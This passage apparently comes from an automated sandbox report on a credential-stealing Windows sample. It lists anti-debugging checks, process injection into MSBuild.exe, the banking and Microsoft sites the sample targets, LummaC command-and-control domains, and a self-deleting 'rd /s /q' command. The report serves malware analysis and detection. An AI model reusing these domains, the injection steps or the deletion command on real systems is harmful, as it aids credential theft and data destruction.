                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: Amcache.hve.7.drBinary or memory string: VMware
                          Source: BFCGDA.4.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: AMC password management pageVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                          Source: BFCGDA.4.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                          Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: BFCGDA.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.0000000001373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: BFCGDA.4.drBinary or memory string: tasks.office.comVMware20,11696494690o
                          Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                          Source: BFCGDA.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: global block list test formVMware20,11696494690
                          Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: BFCGDA.4.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                          Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                          Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(=7
                          Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                          Source: BFCGDA.4.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                          Source: BFCGDA.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                          Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: BFCGDA.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                          Source: BFCGDA.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                          Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: BFCGDA.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                          Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                          Source: BFCGDA.4.drBinary or memory string: discord.comVMware20,11696494690f
                          Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                          Source: BFCGDA.4.drBinary or memory string: outlook.office.comVMware20,11696494690s
                          Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                          Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                          Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: BFCGDA.4.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                          Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: BFCGDA.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                          Source: BFCGDA.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                          Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: BFCGDA.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                          Source: BFCGDA.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                          Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                          Source: BFCGDA.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                          Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: BFCGDA.4.drBinary or memory string: dev.azure.comVMware20,11696494690j
                          Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_4-82721
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_4-82737
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_4-84052
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess queried: DebugPortJump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006120AD VirtualProtect,LdrInitializeThunk,GetConsoleWindow,CloseHandle,SetCursorPos,0_2_006120AD
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061B5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0061B5E6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418950
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061208F mov edi, dword ptr fs:[00000030h]0_2_0061208F
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639362 mov eax, dword ptr fs:[00000030h]0_2_00639362
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063937A mov eax, dword ptr fs:[00000030h]0_2_0063937A
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639385 mov eax, dword ptr fs:[00000030h]0_2_00639385
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00650472 mov eax, dword ptr fs:[00000030h]0_2_00650472
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627EE8 mov eax, dword ptr fs:[00000030h]0_2_00627EE8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061EE9C mov ecx, dword ptr fs:[00000030h]0_2_0061EE9C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004014AD mov eax, dword ptr fs:[00000030h]4_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040148A mov eax, dword ptr fs:[00000030h]4_2_0040148A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004014A2 mov eax, dword ptr fs:[00000030h]4_2_004014A2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418599 mov eax, dword ptr fs:[00000030h]4_2_00418599
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041859A mov eax, dword ptr fs:[00000030h]4_2_0041859A
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AF208F mov edi, dword ptr fs:[00000030h]13_2_00AF208F
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AFEE9C mov ecx, dword ptr fs:[00000030h]13_2_00AFEE9C
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B07EE8 mov eax, dword ptr fs:[00000030h]13_2_00B07EE8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062A4E7 GetProcessHeap,0_2_0062A4E7
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006174A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006174A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061B5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0061B5E6
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006177C5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006177C5
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00617952 SetUnhandledExceptionFilter,0_2_00617952
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041D016
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041D98C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0042762E SetUnhandledExceptionFilter,4_2_0042762E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C8BB66C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C8BB1F7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA6AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6CA6AC62
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AF74A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00AF74A0
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AFB5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00AFB5E6
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AF77C5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00AF77C5
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AF7952 SetUnhandledExceptionFilter,13_2_00AF7952

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR
                          Allocates memory in foreign processes
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Contains functionality to inject code into remote processes
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,4_2_0040F54A
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                          LummaC encrypted strings found
                          Source: CBFCFBFBFB.exeString found in binary or memory: questionsmw.stor
                          Source: CBFCFBFBFB.exeString found in binary or memory: soldiefieop.site
                          Source: CBFCFBFBFB.exeString found in binary or memory: mysterisop.site
                          Source: CBFCFBFBFB.exeString found in binary or memory: absorptioniw.site
                          Source: CBFCFBFBFB.exeString found in binary or memory: treatynreit.site
                          Source: CBFCFBFBFB.exeString found in binary or memory: snarlypagowo.site
                          Source: CBFCFBFBFB.exeString found in binary or memory: abnomalrkmu.site
                          Source: CBFCFBFBFB.exeString found in binary or memory: chorusarorp.site
                          Searches for specific processes (likely to inject)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_004124A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_0041257F
                          Writes to foreign memory regions
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 882008Jump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000Jump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000Jump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000Jump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11BF008Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exitJump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639076 cpuid 0_2_00639076
                          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0062A0B0
                          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_0062A1B6
                          Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,0_2_0065D2BB
                          Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0062A285
                          Source: C:\Users\user\Desktop\file.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0065F44E
                          Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00629921
                          Source: C:\Users\user\Desktop\file.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,0_2_00661928
                          Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00621A42
                          Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_00662A18
                          Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00629BC3
                          Source: C:\Users\user\Desktop\file.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,0_2_00661C46
                          Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00629C0E
                          Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00629CA9
                          Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00660C9C
                          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00629D34
                          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00621EEC
                          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00629F87
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_00410DDB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0042B0CC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_0042B1C1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_00429A50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_0042B268
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_0042B2C3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,4_2_0042AB40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,4_2_004253E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_0042B494
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,4_2_0042749C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesA,4_2_0042B556
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_00429D6E
